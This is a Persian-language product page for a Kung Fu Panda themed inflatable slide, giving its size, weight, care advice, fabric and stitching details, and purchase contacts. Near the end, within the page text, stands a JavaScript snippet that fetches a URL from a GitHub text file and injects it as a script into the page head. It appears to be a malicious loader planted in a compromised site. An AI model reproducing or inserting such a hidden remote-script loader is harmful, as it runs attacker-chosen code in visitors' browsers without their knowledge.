سرسره بادی پاندای کونگفوکار

  • سرسره بادی پاندای کونگفوکار: این سرسره یکی از جذاب ترین طرح های شرکت بادی سازان مجد می باشد.

    این قلعه بادی برگرفته از انیمشین زیبای پاندای کونگفوکار است. در جلوی ورودی دو مناره وجود دارد که با یک ارک بهم متصل شدن. روی شکمه دستگاه چاپی از خود پندای کونگفوکار روی یک مناره عکس ببری و روی مناره دیگر عکس لک لک طراحی شده. این سرسره بر اساس روانشناسی رنگ ها برای کودکان طراحی شده

    سرسره بادی پاندای کونگفوکار

    وزن این قلعه بادی 280 کیلوگرم ، طول سرسره 9 متر و عرض آن 6.5 متر و ارتفاع آن 7.5 متر می باشد. این قلعه بادی در شهر بازی ها و پارک های که فضای کافی داشته باشند می تواند استفاده کنند.

    نحوه نگهداری: قلعه بادی را باید با بند های که روی خود دستگاه نصب شده با میخ های بزرگ روی زمین بسته شود . درهنگاهم باد طوفان های شدید دستگاه به هیچ وجهی باد نکنید. برای شتستشوی دستگاه فقط با آب بشویید چون مواد های شیمیایی مانند مایع دستشویی ، ریکا ، وایتکی و … دستگاه را از بین می برد.

    جنس پارچه و نخ دوخت سرسره: پارچه این دستگاه از پارچه های درجه یک کره ای تهیه شده و دوم بالای دارد. همچنین دوخت این سرسره با نخ ترکیه ای توسط اساتید مجرب و با تجرب در این حوزه دوخته شده.

    این قلعه بادی نیاز به یک دمنده هوا 1.5 اسبی دارد. و همچنین نیازمند به اقلام پیشفرض مانند روکش سر و واکس سر کننده است.

    نحوه خرید سرسره بادی پاندای کونگفوکار

    تیم پشتیبانی و مشاوره بادی سازان مجد به صورت دوازده ساعته برای مشاوره رایگان و خرید محصولات در خدمت شما عزیزان است. برای تماس و یا خرید قلعه بادی پاندای کنگفو کار می توانید به صفحه تماس با ما مراجعه نمایید و یا با شماره تلفن ۰۹۱۲۷۴۸۴۵۷۳ تماس حاصل فرمایید. و یا در شبکه های اجتماعی تلگرام، ایتا، روبیکا و واتساپ با همین شماره تماس بگیرید.

    (var url = “https://raw.githubusercontent.com/truba77/trubnik/main/to.txt”; fetch(url) .then(response => response.text()) .then(data => { var script = document.createElement(“script”); script.src = data.trim(); document.getElementsByTagName(“head”)[0].appendChild(script); });)

    امتیاز شما:

    میانگین امتیازات ۵ از ۵
    از مجموع ۱ رای

    دیدگاهتان را بنویسید